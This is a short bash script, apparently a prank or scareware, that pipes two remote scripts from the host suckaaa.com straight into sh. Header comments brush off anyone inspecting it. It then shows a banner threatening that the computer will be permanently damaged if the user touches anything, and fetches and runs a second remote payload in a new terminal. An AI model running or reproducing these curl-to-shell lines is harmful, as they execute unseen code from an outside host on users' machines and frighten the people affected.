#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

bigMsg "☠☠☠ DON'T TOUCH A THING!! IF YOU DO YOUR COMPUTER WILL BE PERMANENTLY DAMAGED!! ☠☠☠";

sleep 3s;

termdo 'curl -s https://suckaaa.com/s/loL | sh';
